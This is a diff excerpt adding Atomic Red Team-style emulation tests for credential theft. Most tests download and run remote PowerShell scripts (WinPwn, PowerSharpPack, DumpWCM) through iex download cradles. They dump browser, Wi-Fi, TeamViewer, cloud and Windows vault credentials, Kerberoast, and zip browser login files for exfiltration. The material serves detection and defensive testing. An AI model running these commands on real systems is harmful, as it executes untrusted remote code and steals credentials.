+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+powershellsensitive -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - WinPwn - passhunt
+Search for Passwords on this system using passhunt via WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+passhunt -local $true -noninteractive
+```
+
+#### Cleanup Commands:
+```powershell
+rm -force .\passhunt.exe -ErrorAction Ignore
+rm -force .\phunter* -ErrorAction Ignore
+rm -force -recurse .\DomainRecon -ErrorAction Ignore
+rm -force -recurse .\Exploitation -ErrorAction Ignore
+rm -force -recurse .\LocalPrivEsc -ErrorAction Ignore
+rm -force -recurse .\LocalRecon -ErrorAction Ignore
+rm -force -recurse .\Vulnerabilities -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - WinPwn - SessionGopher
+Launches SessionGopher on this system via WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c9dc9de3-f961-4284-bd2d-f959c9f9fda5
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+sessionGopher -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials
+Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** aaa87b0e-5232-4649-ae5c-f1724a4b2798
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+SharpCloud -consoleoutput -noninteractive
+```
+
+
+
+
+
+
 <br/>

atomics/T1552.001/T1552.001.yaml

@@ -67,5 +67,78 @@ atomic_tests:
     elevation_required: false # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false.
     command: | 
       for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done 
-      
-
+- name: WinPwn - sensitivefiles
+  auto_generated_guid: 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0
+  description: Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      sensitivefiles -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - Snaffler
+  auto_generated_guid: fdd0c913-714b-4c13-b40f-1824d6c015f2
+  description: Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      Snaffler -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - powershellsensitive
+  auto_generated_guid: 75f66e03-37d3-4704-9520-3210efbe33ce
+  description: Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      powershellsensitive -consoleoutput -noninteractive
+    name: powershell
+- name: WinPwn - passhunt
+  auto_generated_guid: 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797
+  description: Search for Passwords on this system using passhunt via WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      passhunt -local $true -noninteractive
+    cleanup_command: |-
+      rm -force .\passhunt.exe -ErrorAction Ignore
+      rm -force .\phunter* -ErrorAction Ignore
+      rm -force -recurse .\DomainRecon -ErrorAction Ignore
+      rm -force -recurse .\Exploitation -ErrorAction Ignore
+      rm -force -recurse .\LocalPrivEsc -ErrorAction Ignore
+      rm -force -recurse .\LocalRecon -ErrorAction Ignore
+      rm -force -recurse .\Vulnerabilities -ErrorAction Ignore
+    name: powershell
+- name: WinPwn - SessionGopher
+  auto_generated_guid: c9dc9de3-f961-4284-bd2d-f959c9f9fda5
+  description: Launches SessionGopher on this system via WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      sessionGopher -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials
+  auto_generated_guid: aaa87b0e-5232-4649-ae5c-f1724a4b2798
+  description: Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      SharpCloud -consoleoutput -noninteractive  
+    name: powershell   
+   

atomics/T1555.003/T1555.003.md

@@ -28,6 +28,18 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
 
 - [Atomic Test #8 - Decrypt Mozilla Passwords with Firepwd.py](#atomic-test-8---decrypt-mozilla-passwords-with-firepwdpy)
 
+- [Atomic Test #9 - LaZagne.py - Dump Credentials from Firefox Browser](#atomic-test-9---lazagnepy---dump-credentials-from-firefox-browser)
+
+- [Atomic Test #10 - Stage Popular Credential Files for Exfiltration](#atomic-test-10---stage-popular-credential-files-for-exfiltration)
+
+- [Atomic Test #11 - WinPwn - BrowserPwn](#atomic-test-11---winpwn---browserpwn)
+
+- [Atomic Test #12 - WinPwn - Loot local Credentials - mimi-kittenz](#atomic-test-12---winpwn---loot-local-credentials---mimi-kittenz)
+
+- [Atomic Test #13 - WinPwn - PowerSharpPack - Sharpweb for Browser Credentials](#atomic-test-13---winpwn---powersharppack---sharpweb-for-browser-credentials)
+
+- [Atomic Test #14 - Simulating Access to Chrome Login Data - MacOS](#atomic-test-14---simulating-access-to-chrome-login-data---macos)
+
 
 <br/>
 
@@ -517,4 +529,236 @@ if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec%
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - LaZagne.py - Dump Credentials from Firefox Browser
+Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser, Reference https://github.com/AlessandroZ/LaZagne
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 87e88698-621b-4c45-8a89-4eaebdeaabb1
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| lazagne_path | Path you put LaZagne Github with LaZagne.py | String | /tmp/LaZagne/Linux|
+| specific_module | You may change the module to "all" for all password that can be found by LaZagne.py | string | browsers -firefox|
+| output_file | This is where output for the Firefox passwords goes | String | /tmp/firefox_password.txt|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+python3 #{lazagne_path}/laZagne.py #{specific_module} >> #{output_file}
+```
+
+#### Cleanup Commands:
+```sh
+rm -R /tmp/LaZagne; rm -f #{output_file}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Get Lazagne from Github and install requirements
+##### Check Prereq Commands:
+```sh
+test -f #{lazagne_path}/laZagne.py
+```
+##### Get Prereq Commands:
+```sh
+cd /tmp; git clone https://github.com/AlessandroZ/LaZagne; cd /tmp/LaZagne/; pip install -r requirements.txt
+```
+##### Description: Needs git, python3 and some pip stuff
+##### Check Prereq Commands:
+```sh
+which git && which python3 && which pip
+```
+##### Get Prereq Commands:
+```sh
+apt install git; apt install python3-pip -y; pip install pyasn1 psutil Crypto
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Stage Popular Credential Files for Exfiltration
+This test is designed to search a drive for credential files used by the most common web browsers on Windows (Firefox, Chrome, Opera, and Edge), export the found files to a folder, and zip it,
+simulating how an adversary might stage sensitive credential files for exfiltration in order to conduct offline password extraction with tools like [firepwd.py](https://github.com/lclevy/firepwd) or [HackBrowserData](https://github.com/moonD4rk/HackBrowserData).
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f543635c-1705-42c3-b180-efd6dc6e7ee7
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$exfil_folder = "$env:temp\T1555.003"
+if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force}
+$FirefoxCredsLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
+if (test-path "$FirefoxCredsLocation\key4.db") {copy-item "$FirefoxCredsLocation\key4.db" -destination "$exfil_folder\T1555.003Firefox_key4.db"} else {}
+if (test-path "$FirefoxCredsLocation\logins.json") {copy-item "$FirefoxCredsLocation\logins.json" -destination "$exfil_folder\T1555.003Firefox_logins.json"} else {}
+if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -destination "$exfil_folder\T1555.003Chrome_Login Data"} else {}
+if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account" -destination "$exfil_folder\T1555.003Chrome_Login Data For Account"} else {}
+if (test-path "$env:appdata\Opera Software\Opera Stable\Login Data") {copy-item "$env:appdata\Opera Software\Opera Stable\Login Data" -destination "$exfil_folder\T1555.003Opera_Login Data"} else {}
+if (test-path "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data") {copy-item "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data" -destination "$exfil_folder\T1555.003Edge_Login Data"} else {} 
+compress-archive -path "$exfil_folder" -destinationpath "$exfil_folder.zip" -force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "$env:temp\T1555.003.zip" -force -erroraction silentlycontinue   
+Remove-Item -Path "$env:temp\T1555.003\" -force -recurse -erroraction silentlycontinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - WinPwn - BrowserPwn
+Collect Browser credentials as well as the history via winpwn browserpwn function of WinPwn.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 764ea176-fb71-494c-90ea-72e9d85dce76
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+browserpwn -consoleoutput -noninteractive
+```
+
+#### Cleanup Commands:
+```powershell
+rm .\System.Data.SQLite.dll -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - WinPwn - Loot local Credentials - mimi-kittenz
+Loot local Credentials - mimi-kittenz technique via function of WinPwn - Extend timeout to 600s
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ec1d0b37-f659-4186-869f-31a554891611
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+kittenz -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #13 - WinPwn - PowerSharpPack - Sharpweb for Browser Credentials
+PowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e5e3d639-6ea8-4408-9ecd-d5a286268ca0
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')
+Invoke-Sharpweb -command "all"
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #14 - Simulating Access to Chrome Login Data - MacOS
+This test locates the Login Data files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil. 
+Once the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction. 
+See https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ .
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 124e13e5-d8a1-4378-a6ee-a53cd0c7e369
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data"
+cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"
+```
+
+#### Cleanup Commands:
+```sh
+rm "/tmp/T1555.003_Login Data" >/dev/null 2>&1
+rm "/tmp/T1555.003_Login Data For Account" >/dev/null 2>&1
+```
+
+
+
+
+
 <br/>

atomics/T1555.003/T1555.003.yaml

@@ -282,3 +282,107 @@ atomic_tests:
      cat #{Out_Filepath}
     cleanup_command: |
      Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue   
+- name: LaZagne.py - Dump Credentials from Firefox Browser
+  auto_generated_guid: 87e88698-621b-4c45-8a89-4eaebdeaabb1
+  description: Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser, Reference https://github.com/AlessandroZ/LaZagne
+  supported_platforms:
+  - linux
+  input_arguments:
+    lazagne_path:
+      description: Path you put LaZagne Github with LaZagne.py
+      type: String
+      default: /tmp/LaZagne/Linux
+    specific_module:
+      description: You may change the module to "all" for all password that can be found by LaZagne.py
+      type: string
+      default: 'browsers -firefox'
+    output_file:
+      description: This is where output for the Firefox passwords goes
+      type: String
+      default: /tmp/firefox_password.txt
+  dependency_executor_name: sh
+  dependencies:
+  - description: Get Lazagne from Github and install requirements
+    prereq_command: 'test -f #{lazagne_path}/laZagne.py'
+    get_prereq_command: cd /tmp; git clone https://github.com/AlessandroZ/LaZagne; cd /tmp/LaZagne/; pip install -r requirements.txt
+  - description: Needs git, python3 and some pip stuff
+    prereq_command: which git && which python3 && which pip
+    get_prereq_command: apt install git; apt install python3-pip -y; pip install pyasn1 psutil Crypto
+  executor:
+    command: 'python3 #{lazagne_path}/laZagne.py #{specific_module} >> #{output_file}'
+    cleanup_command: 'rm -R /tmp/LaZagne; rm -f #{output_file}'
+    name: sh
+    elevation_required: true
+- name: Stage Popular Credential Files for Exfiltration
+  auto_generated_guid: f543635c-1705-42c3-b180-efd6dc6e7ee7
+  description: |
+    This test is designed to search a drive for credential files used by the most common web browsers on Windows (Firefox, Chrome, Opera, and Edge), export the found files to a folder, and zip it,
+    simulating how an adversary might stage sensitive credential files for exfiltration in order to conduct offline password extraction with tools like [firepwd.py](https://github.com/lclevy/firepwd) or [HackBrowserData](https://github.com/moonD4rk/HackBrowserData). 
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell 
+    command: |
+     $exfil_folder = "$env:temp\T1555.003"
+     if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force}
+     $FirefoxCredsLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
+     if (test-path "$FirefoxCredsLocation\key4.db") {copy-item "$FirefoxCredsLocation\key4.db" -destination "$exfil_folder\T1555.003Firefox_key4.db"} else {}
+     if (test-path "$FirefoxCredsLocation\logins.json") {copy-item "$FirefoxCredsLocation\logins.json" -destination "$exfil_folder\T1555.003Firefox_logins.json"} else {}
+     if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -destination "$exfil_folder\T1555.003Chrome_Login Data"} else {}
+     if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account" -destination "$exfil_folder\T1555.003Chrome_Login Data For Account"} else {}
+     if (test-path "$env:appdata\Opera Software\Opera Stable\Login Data") {copy-item "$env:appdata\Opera Software\Opera Stable\Login Data" -destination "$exfil_folder\T1555.003Opera_Login Data"} else {}
+     if (test-path "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data") {copy-item "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data" -destination "$exfil_folder\T1555.003Edge_Login Data"} else {} 
+     compress-archive -path "$exfil_folder" -destinationpath "$exfil_folder.zip" -force
+    cleanup_command: |
+     Remove-Item -Path "$env:temp\T1555.003.zip" -force -erroraction silentlycontinue   
+     Remove-Item -Path "$env:temp\T1555.003\" -force -recurse -erroraction silentlycontinue
+- name: WinPwn - BrowserPwn
+  auto_generated_guid: 764ea176-fb71-494c-90ea-72e9d85dce76
+  description: Collect Browser credentials as well as the history via winpwn browserpwn function of WinPwn.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      browserpwn -consoleoutput -noninteractive
+    cleanup_command: |-
+      rm .\System.Data.SQLite.dll -ErrorAction Ignore
+    name: powershell
+- name: WinPwn - Loot local Credentials - mimi-kittenz
+  auto_generated_guid: ec1d0b37-f659-4186-869f-31a554891611
+  description: Loot local Credentials - mimi-kittenz technique via function of WinPwn - Extend timeout to 600s
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      kittenz -consoleoutput -noninteractive
+    name: powershell
+- name: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials 
+  auto_generated_guid: e5e3d639-6ea8-4408-9ecd-d5a286268ca0
+  description: PowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')
+      Invoke-Sharpweb -command "all"
+    name: powershell
+- name: Simulating Access to Chrome Login Data - MacOS
+  auto_generated_guid: 124e13e5-d8a1-4378-a6ee-a53cd0c7e369
+  description: |
+    This test locates the Login Data files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil. 
+    Once the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction. 
+    See https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ . 
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data"
+      cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"
+    cleanup_command: |
+      rm "/tmp/T1555.003_Login Data" >/dev/null 2>&1
+      rm "/tmp/T1555.003_Login Data For Account" >/dev/null 2>&1
+    name: sh

atomics/T1555.004/T1555.004.md

@@ -14,6 +14,8 @@ Adversaries may use password recovery tools to obtain plain text passwords from
 
 - [Atomic Test #1 - Access Saved Credentials via VaultCmd](#atomic-test-1---access-saved-credentials-via-vaultcmd)
 
+- [Atomic Test #2 - WinPwn - Loot local Credentials - Invoke-WCMDump](#atomic-test-2---winpwn---loot-local-credentials---invoke-wcmdump)
+
 
 <br/>
 
@@ -45,4 +47,33 @@ vaultcmd /listcreds:"Windows Credentials"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - WinPwn - Loot local Credentials - Invoke-WCMDump
+Loot local Credentials - Invoke-WCMDump technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** fa714db1-63dd-479e-a58e-7b2b52ca5997
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')
+Invoke-WCMDump
+```
+
+
+
+
+
+
 <br/>

atomics/T1555.004/T1555.004.yaml

@@ -15,3 +15,13 @@ atomic_tests:
     elevation_required: false
     command: |
       vaultcmd /listcreds:"Windows Credentials"
+- name: WinPwn - Loot local Credentials - Invoke-WCMDump 
+  auto_generated_guid: fa714db1-63dd-479e-a58e-7b2b52ca5997
+  description: Loot local Credentials - Invoke-WCMDump technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')
+      Invoke-WCMDump
+    name: powershell

atomics/T1555/T1555.md

@@ -14,6 +14,12 @@
 
 - [Atomic Test #5 - Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]](#atomic-test-5---enumerate-credentials-from-windows-credential-manager-using-vaultcmdexe-web-credentials)
 
+- [Atomic Test #6 - WinPwn - Loot local Credentials - lazagne](#atomic-test-6---winpwn---loot-local-credentials---lazagne)
+
+- [Atomic Test #7 - WinPwn - Loot local Credentials - Wifi Credentials](#atomic-test-7---winpwn---loot-local-credentials---wifi-credentials)
+
+- [Atomic Test #8 - WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords](#atomic-test-8---winpwn---loot-local-credentials---decrypt-teamviewer-passwords)
+
 
 <br/>
 
@@ -178,4 +184,96 @@ vaultcmd /listcreds:"Web Credentials" /all
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - WinPwn - Loot local Credentials - lazagne
+The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer. 
+Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). 
+This tool has been developed for the purpose of finding these passwords for the most commonly-used software
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 079ee2e9-6f16-47ca-a635-14efcd994118
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+lazagnemodule -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - WinPwn - Loot local Credentials - Wifi Credentials
+Loot local Credentials - Wifi Credentials technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** afe369c2-b42e-447f-98a3-fb1f4e2b8552
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+wificreds -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
+Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** db965264-3117-4bad-b7b7-2523b7856b92
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+decryptteamviewer -consoleoutput -noninteractive
+```
+
+
+
+
+
+
 <br/>

atomics/T1555/T1555.yaml

@@ -69,3 +69,39 @@ atomic_tests:
     elevation_required: false
     command: |
       vaultcmd /listcreds:"Web Credentials" /all
+- name: WinPwn - Loot local Credentials - lazagne
+  auto_generated_guid: 079ee2e9-6f16-47ca-a635-14efcd994118
+  description: |-
+    The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer. 
+    Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). 
+    This tool has been developed for the purpose of finding these passwords for the most commonly-used software
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      lazagnemodule -consoleoutput -noninteractive
+    name: powershell
+- name: WinPwn - Loot local Credentials - Wifi Credentials
+  auto_generated_guid: afe369c2-b42e-447f-98a3-fb1f4e2b8552
+  description: Loot local Credentials - Wifi Credentials technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      wificreds -consoleoutput -noninteractive  
+    name: powershell
+- name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
+  auto_generated_guid: db965264-3117-4bad-b7b7-2523b7856b92
+  description: Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      decryptteamviewer -consoleoutput -noninteractive  
+    name: powershell

atomics/T1558.003/T1558.003.md

@@ -22,6 +22,10 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
 
 - [Atomic Test #5 - Request All Tickets via PowerShell](#atomic-test-5---request-all-tickets-via-powershell)
 
+- [Atomic Test #6 - WinPwn - Kerberoasting](#atomic-test-6---winpwn---kerberoasting)
+
+- [Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus](#atomic-test-7---winpwn---powersharppack---kerberoasting-using-rubeus)
+
 
 <br/>
 
@@ -269,4 +273,63 @@ Write-Host Joining this computer to a domain must be done manually
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - WinPwn - Kerberoasting
+Kerberoasting technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 78d10e20-c874-45f2-a9df-6fea0120ec27
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+Kerberoasting -consoleoutput -noninteractive
